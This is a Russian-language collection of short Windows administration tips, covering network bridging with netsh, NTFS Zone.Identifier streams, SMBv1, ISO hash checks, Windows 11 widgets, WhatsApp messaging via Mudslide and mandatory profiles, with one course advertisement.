</> Для реализации динамических групп в on-prem ADDS можно использовать PowerShell автоматизацию. С помощью несложного скрипта можно настроить правила выборки пользователей для добавления или исключения из определённой группы безопасности. Затем с помощью планировщика задач на контроллере домена можно с нужной периодичностью запускать ваш скрипт, которые будет автоматически добавлять или исключать пользователей из целевой группы в зависимости от текущих значений их атрибутов.

💪 Как реализовать динамические группы пользователей в Active Directory с помощью PowerShell

모 Во всех версиях Windows можно объединить несколько сетевых интерфейсов в интерфейс типа мост (bridge). Такой сетевой мост используется для прозрачного объединение нескольких подсетей в одну общую сеть на канальном (L2) уровне модели OSI.

📚 Исторически в Windows, сетевой интерфейс bridge можно было создать только из графического интерфейса управления сетевыми адаптерами (ncpa.cpl). Однако в сентябрьском обновлении 2023 года для Windows 11 22H2 была добавлена опция создания сетевого моста из командной строки с помощью утилиты netsh.

🔹 Вывести доступные сетевые адаптеры для объединения в мост:

netsh bridge show adapter

🔹 Чтобы создать мост из двух интерфейсов, укажите их имена в команде:

netsh bridge create Ethernet1 WiFi

🔹Добавить дополнительный адаптер в мост:

netsh bridge add <Adapter_Name> to <bridge_guid>

Как создать сетевой мост из нескольких интерфейсов с помощью встроенных средств Windows

📢Приглашение на открытый вебинар: CI/CD для быстрой и качественной разработки 1С

Тратите много времени на ручные процессы и тестирование в разработке 1С? Качество программного обеспечения оставляет желать лучшего?

🌟 На открытом уроке рассмотрим:

- что такое CI/CD и из каких компонентов это состоит;
- какие инструменты могут быть использованы для реализации CI/CD в 1С;
- как CI/CD помогает ускорить разработку и повысить качество программного обеспечения.

Урок будет полезен: разработчикам 1С, системных администраторам и тех, кто хочет начать карьеру в DevOps 1С.

После открытого вебинара вы будете эффективно использовать CI/CD для автоматизации процессов, ускорения разработки и повышения качества ПО.

📆Присоединяйтесь к открытому вебинару 03 октября в 20:00 мск!

Встречаемся в преддверии старта курса «DevOps 1С». Все участники вебинара получат специальную цену на обучение!
Регистрируйтесь прямо сейчас, чтобы не пропустить мероприятие: https://vk.cc/cBt7eq

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

❓Обращали внимание, что в свойствах файлов скачанных из Интернета есть предупреждение о том, что файл был получен с другого компьютера. Причём такое предупреждение выводится не только для исполняемых файлов и скриптов, но и простых текстовых документов, картинок, аудио и других, казалось бы нейтральных, типов файлов. Ни переименование, ни перемещение файла на очищает эту метку.

📚 Дело в том, что файлы, которые скачиваются с помощью браузера и сохраняются на NTFS том, получают особый идентификатор, хранящийся в альтернативном потоке NTFS (Alternate Data Streams). Все популярные браузеры поддерживают этот механизм и проставляют для полученных из интерната файлов метку Zone.Identifier.

Ее значение можно посмотреть с помощью блокнота:

notepad.exe a-ha-lifelines.mp3:zone.identifier

или с помощью PowerShell.

Get-Content -Path a-ha-lifelines.mp3 -Stream Zone.Identifier 

Мы получим такой идентификатор зоны передачи:

[ZoneTransfer]
ZoneId=3

🔹 Причем в метке могут присутствовать и другие данные. В моем случае это ссылки на сайт, с которого я скачал MP3 файл. Проводник и большинство других приложений работают только со стандартным потоком и не отображают данные из альтернативных потоков NTFS. В альтернативный поток данных можно спрятать что угодно, причем размер данных в альтернативном потоке может превышать размер основного файла!

🔹 Параметр ZoneId может принимать пять значений от 0 до 4. Когда пользователь загружает файл, браузер автоматически определяет зону безопасности и ставит ему соответствующую этой зоне метку. Зона безопасности 3 используется для сайтов в Интернете.

Чтобы очистить метку альтернативного потока данных, нужно нажать кнопку Разблокировать в свойствах файла или очистить ее с помощью PowerShell:

Unblock-File a-ha-lifelines.mp3

Как Windows определяет, что файл был скачан из Интернета

📁 Протокол доступа к общим файлам SMB 1.0 (Server Message Block) по умолчанию отключен в последних версиях Windows 11 и 10, а также в Windows Server 2019/2022. Эта версия протокола является небезопасной со множеством легко эксплуатируемых уязвимосией, и не рекомендуется использовать ее на устройствах в локальной сети. Подавляющее большинство современных ОС и прошивок оборудования поддерживают более безопасные версии протокола SMB (2.x и 3.x).

🏛 SMB v1 может быть необходим, только если в вашей сети остались устаревшие устройства с Windows XP/2003, старые версии NAS, сетевые сканеры с поддержкой только старой SMBv1, устройства со старыми версиями samba, и т.д.

🕵🏻‍♀️ С помощью политик аудита Windows можно обнаружить в сети устройства, которые используют версию SMBv1 для подключения к файловому серверу.

✅ Настоятельно рекомендуется обновить на таких устройствах ОС или прошивку, до версии поддерживающий, более безопасные протоколы SMBv2 или SMBv3. Если это невозможно, можно включить на отдельном сервере или клиенте поддержку SMB1, но в этом случае желательно хотя бы с помощью файервола запретить доступ к такому устройству со всех IP адресов, кроме минимального списка доверенных.

Как включить или отключить протокол SMB 1.0 в Windows 10/11 и Windows Server?

🏴‍☠️Неизменно популярный способ загрузки ISO образов Windows с торрент-трекеров всегда несет риски получения под капотом пиратской г-сборки с интегрированным туда трояном, майнером или другой пакостью. Поэтому, для любого полученного альтернативными путями “оригинального” ISO образа Windows нужно как минимум проверять его контрольную сумму.

✅ Можно использовать встроенный PowerShell командлет:

Get-FileHash  .\en-us_windows_10_enterprise_ltsc_2021_x64_dvd_d289cf96.iso -Algorithm SHA256

Контрольные суммы оригинальных всех ISO образов Microsoft можно найти
🔹 В разделе загрузок на официальном сайте https://my.visualstudio.com/downloads ( вход под учетной записью Microsoft, активная подписка не обязательна)
🔹На стороннем ресурсе https://msdn.rg-adguard.net/ - здесь можно искать непосредственно по полученному выше хэшу

Проверка контрольной (хеш) суммы файла в Windows

📰 Одним из новых элементов интерфейса Windows 11 стали виджеты или мини-приложения, которые открываются из панели задач. Некоторый пользователи жалуются, что основной процесс widgets.exe и дочерние процессы msedgewebwebview2.exe вызывают повышенную нагрузку на CPU и сильно расходуют RAM даже при простое.
🔹 Можно скрыть виджеты в панели задач Windows 11 через реестр:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarDa" /t REG_DWORD /d "0" /f

🔹 Или через GPO: Computer Configuration -> Administrative Templates -> Windows Components -> Widgets -> Allow Widgets

🚫 Но фактически они все еще будут работать в фоне. Помогает только удаление UWP приложения. Из профиля текущего пользователя:

winget uninstall "windows web experience pack" 

Если на компьютере несколько пользователей, можно удалить приложение из каждого с помощью командлетов Remove-AppxPackage и Remove-AppxProvisionedPackage

✅ Отключить виджеты (мини-приложения) в панели задач Windows 11

💬 В рамках одного из проектов понадобилось организовать рассылку оповещений пользователям в мессенджер WhatsApp из скрипта. Для такой задачи можно использовать консольный клиент Mudslide. Mudslide – это JavaScript модуль на фреймворке Node.js и библиотеке Baileys, позволяет подключаться к API WhatsApp Web.
📜 Модуль можно установить с помощью пакетного менеджера NPM:

npm install -g mudslide 

Или скачать готовый скомпилированный файл со страницы проекта (есть версии для Windows и Linux).
🔐 Для авторизации в аккаунте понадобится смартфон с установленным приложением WhatsApp:

npx mudslide login 

или

mudslide.exe login 

Отсканируйте QR код в приложении и можете отправить текстовое сообщение в WhatsApp на указанный номер:

mudslide.exe send 79123456789 "Hello" 

Можно отправить картинку, координаты или прикрепить файл:

mudslide send-image 79123456789 imagepath.jpg 
mudslide send-location me 55.752121 37.617664 
mudslide send-file me C:\temp\scan.pdf 

Отправка сообщений в WhatsApp из командной строки Windows/Linux

👻 Если вы хотите, чтобы ваши пользователи работали в Windows-окружении, которое сбрасывается при завершении сеанса, можно настроить для них специальный тип профиля, который называется mandatory (обязательный). Mandatory профиль настраивается администратором и назначается определенным пользователям. Любые изменения, которые внесли пользователи за время работы в таком сеансе будут сброшены при завершении сессии 🗑.

Использование read-only (mandatory) профилей пользователей в Windows

📚 Такой тип профилей обычно используют на общедоступных компьютерах, киосках и в образовательных учреждениях, когда нужно очищать все сделанное пользователем за время сеанса.

⚙️ Если вам нужно полностью защитить Windows от любых изменений на файловой системе, можно использовать другую технологию с фильтрами записи на диск Unified Write Filter (UWF).